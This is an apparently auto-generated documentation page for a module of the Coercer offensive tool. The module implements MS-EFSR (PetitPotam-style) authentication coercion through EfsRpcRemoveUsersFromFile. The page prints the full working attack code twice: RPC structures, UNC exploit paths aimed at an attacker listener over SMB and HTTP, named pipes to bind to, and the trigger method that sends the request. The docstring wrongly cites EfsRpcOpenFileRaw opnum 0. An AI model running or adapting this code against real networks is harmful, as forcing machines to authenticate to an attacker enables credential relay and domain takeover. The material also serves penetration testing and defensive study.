coercer.methods.MS_EFSR.EfsRpcRemoveUsersFromFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcRemoveUsersFromFile.py
  4# Author             : XiaoliChan
  5# Date created       : 18 Mar 2023
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13class EFS_HASH_BLOB(NDRSTRUCT):
 14    
 15    structure = (
 16        ('Data', DWORD),
 17        ('cbData', PCHAR),
 18    )
 19
 20class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
 21    structure = (
 22        ('Lenght', DWORD),
 23        ('SID', RPC_SID),
 24        ('Hash', EFS_HASH_BLOB),
 25        ('Display', LPWSTR),
 26    )  
 27
 28class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
 29    align = 1
 30    structure = (
 31        ('Cert', DWORD),
 32        ('Users', ENCRYPTION_CERTIFICATE_HASH),
 33    )
 34
 35class _EfsRpcRemoveUsersFromFile(NDRCALL):
 36    """
 37    Structure to make the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/28609dad-5fa5-4af9-9382-18d40e3e9dec)
 38    """
 39    opnum = 8
 40    structure = (
 41        ('FileName', WSTR),
 42        ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
 43    )
 44
 45class _EfsRpcRemoveUsersFromFileResponse(NDRCALL):
 46    """
 47    Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 48    """
 49    structure = ()
 50
 51
 52class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
 53    """
 54    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 55
 56    Method found by:
 57     - [@topotam77](https://twitter.com/topotam77)
 58    """
 59
 60    exploit_paths = [
 61        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 62        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 63        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 64        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 65    ]
 66
 67    access = {
 68        "ncan_np": [
 69            {
 70                "namedpipe": r"\PIPE\efsrpc",
 71                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 72                "version": "1.0"
 73            },
 74            {
 75                "namedpipe": r"\PIPE\lsarpc",
 76                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 77                "version": "1.0"
 78            },
 79            {
 80                "namedpipe": r"\PIPE\samr",
 81                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 82                "version": "1.0"
 83            },
 84            {
 85                "namedpipe": r"\PIPE\lsass",
 86                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 87                "version": "1.0"
 88            },
 89            {
 90                "namedpipe": r"\PIPE\netlogon",
 91                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 92                "version": "1.0"
 93            },
 94        ],
 95        "ncacn_ip_tcp": [
 96            {
 97                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 98                "version": "1.0"
 99            },
100            {
101                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
102                "version": "1.0"
103            }
104        ]
105    }
106
107    protocol = {
108        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
109        "shortname": "MS-EFSR"
110    }
111
112    function = {
113        "name": "EfsRpcRemoveUsersFromFile",
114        "opnum": 8,
115        "vulnerable_arguments": ["FileName"]
116    }
117
118    def trigger(self, dcerpc_session, target):
119        if dcerpc_session is not None:
120            try:
121                request = _EfsRpcRemoveUsersFromFile()
122                request['FileName'] = self.path
123                resp = dcerpc_session.request(request)
124                return ""
125            except Exception as err:
126                return err
127        else:
128            print("[!] Error: dce is None, you must call connect() first.")
129            return None
class EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
14class EFS_HASH_BLOB(NDRSTRUCT):
15    
16    structure = (
17        ('Data', DWORD),
18        ('cbData', PCHAR),
19    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
21class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
22    structure = (
23        ('Lenght', DWORD),
24        ('SID', RPC_SID),
25        ('Hash', EFS_HASH_BLOB),
26        ('Display', LPWSTR),
27    )  

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class ENCRYPTION_CERTIFICATE_HASH_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
29class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
30    align = 1
31    structure = (
32        ('Cert', DWORD),
33        ('Users', ENCRYPTION_CERTIFICATE_HASH),
34    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

align = 1
structure = (('Cert', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class EfsRpcRemoveUsersFromFile(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 53class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
 54    """
 55    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 56
 57    Method found by:
 58     - [@topotam77](https://twitter.com/topotam77)
 59    """
 60
 61    exploit_paths = [
 62        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 63        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 64        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 65        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 66    ]
 67
 68    access = {
 69        "ncan_np": [
 70            {
 71                "namedpipe": r"\PIPE\efsrpc",
 72                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 73                "version": "1.0"
 74            },
 75            {
 76                "namedpipe": r"\PIPE\lsarpc",
 77                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 78                "version": "1.0"
 79            },
 80            {
 81                "namedpipe": r"\PIPE\samr",
 82                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 83                "version": "1.0"
 84            },
 85            {
 86                "namedpipe": r"\PIPE\lsass",
 87                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 88                "version": "1.0"
 89            },
 90            {
 91                "namedpipe": r"\PIPE\netlogon",
 92                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 93                "version": "1.0"
 94            },
 95        ],
 96        "ncacn_ip_tcp": [
 97            {
 98                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 99                "version": "1.0"
100            },
101            {
102                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
103                "version": "1.0"
104            }
105        ]
106    }
107
108    protocol = {
109        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
110        "shortname": "MS-EFSR"
111    }
112
113    function = {
114        "name": "EfsRpcRemoveUsersFromFile",
115        "opnum": 8,
116        "vulnerable_arguments": ["FileName"]
117    }
118
119    def trigger(self, dcerpc_session, target):
120        if dcerpc_session is not None:
121            try:
122                request = _EfsRpcRemoveUsersFromFile()
123                request['FileName'] = self.path
124                resp = dcerpc_session.request(request)
125                return ""
126            except Exception as err:
127                return err
128        else:
129            print("[!] Error: dce is None, you must call connect() first.")
130            return None

Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcRemoveUsersFromFile', 'opnum': 8, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
119    def trigger(self, dcerpc_session, target):
120        if dcerpc_session is not None:
121            try:
122                request = _EfsRpcRemoveUsersFromFile()
123                request['FileName'] = self.path
124                resp = dcerpc_session.request(request)
125                return ""
126            except Exception as err:
127                return err
128        else:
129            print("[!] Error: dce is None, you must call connect() first.")
130            return None